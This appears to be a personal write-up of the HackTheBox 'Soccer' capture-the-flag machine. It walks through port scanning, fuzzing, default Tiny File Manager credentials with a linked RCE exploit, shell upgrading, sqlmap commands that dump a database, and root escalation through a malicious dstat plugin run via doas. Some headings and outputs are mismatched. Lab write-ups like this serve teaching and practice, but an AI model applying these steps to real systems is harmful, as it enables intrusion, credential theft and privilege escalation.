CTF socker

Rustscan

rustscan -a soccer.htb

Output:

PORT     STATE SERVICE        REASON
22/tcp   open  ssh            syn-ack
80/tcp   open  http           syn-ack
9091/tcp open  xmltec-xmlmail syn-ack

Port 9091

Port 80

Gobuster

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.soccer.htb" -u http://soccer.htb 

Output:

/index.html           (Status: 200) [Size: 6917]
/.html                (Status: 403) [Size: 162]
/tiny                 (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]

I found a RCE.
https://raw.githubusercontent.com/febinrev/tinyfilemanager-2.4.3-exploit/main/exploit.sh
Let’s follow the exemple…

And it’s the good password, but the exploit is not working.

User: admin
Password: admin@123

Revershell

Upgrade the shell

python3 -c 'import pty;pty.spawn("/bin/bash")' 
export TERM=xterm # allow clear command

Then Ctrl + Z.

stty raw -echo; fg # allow auto completion

lse.sh

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/local/bin/doas
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst080 Can we read subdirectories under /home?......................... yes!

/etc/passwd

lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
player:x:1001:1001::/home/player:/bin/bash
mysql:x:113:121:MySQL Server,,,:/nonexistent:/bin/false
_laurel:x:997:997::/var/log/laurel:/bin/false

Linpease

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560

Potentially Vulnerable to CVE-2022-2588



╔══════════╣ Checking doas.conf
permit nopass player as root cmd /usr/bin/dstat

cat /etc/nginx/sites-enabled/*

Output:

# We already know this one
server_name soccer.htb;


server_name soc-player.soccer.htb;
root /root/app/views;

I need to add soc-player.soccer.htb to my /etc/hosts.
It’s an another website, interesting.
The root is in /root/app/views, maybe I can be root with this one.

I’ve created an account.

I have the ticker number 85240.
It’s using this script to connect:

<script>
    var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
    window.onload = function () {
    
    var btn = document.getElementById('btn');
    var input = document.getElementById('id');
    
    ws.onopen = function (e) {
        console.log('connected to the server')
    }
    input.addEventListener('keypress', (e) => {
        keyOne(e)
    });
    
    function keyOne(e) {
        e.stopPropagation();
        if (e.keyCode === 13) {
            e.preventDefault();
            sendText();
        }
    }
    
    function sendText() {
        var msg = input.value;
        if (msg.length > 0) {
            ws.send(JSON.stringify({
                "id": msg
            }))
        }
        else append("????????")
    }
    }
    
    ws.onmessage = function (e) {
    append(e.data)
    }
    
    function append(msg) {
    let p = document.querySelector("p");
    // let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
    // p.style.color = randomColor;
    p.textContent = msg
    }
</script>

var ws = new WebSocket(“ws://soc-player.soccer.htb:9091”);
It’s not working via http, it’s a websocket.

sqlmap -u “http://localhost:8081/?id=1“ -p “id” –dbs –dbms=mysql

sqlmap -u “http://localhost:8081/?id=1“ -p “id” -D soccer_db –tables –dbms=mysql

sqlmap -u “http://localhost:8081/?id=1“ -p “id” -D soccer_db -T accounts –dump –dbms=mysql

User: player
Password: doas -u root /usr/bin/dstat –cyberw1ng

SSH

Escalation

As we saw with lipease, wt can run this as root:

doas /usr/bin/dstat

https://gtfobins.github.io/gtfobins/dstat/
dstat allows you to run arbitrary python scripts loaded as “external plugins” if they are located in one of the directories stated in the dstat man page under “FILES”:

echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/dstat_xxx.py
doas -u root /usr/bin/dstat --xxx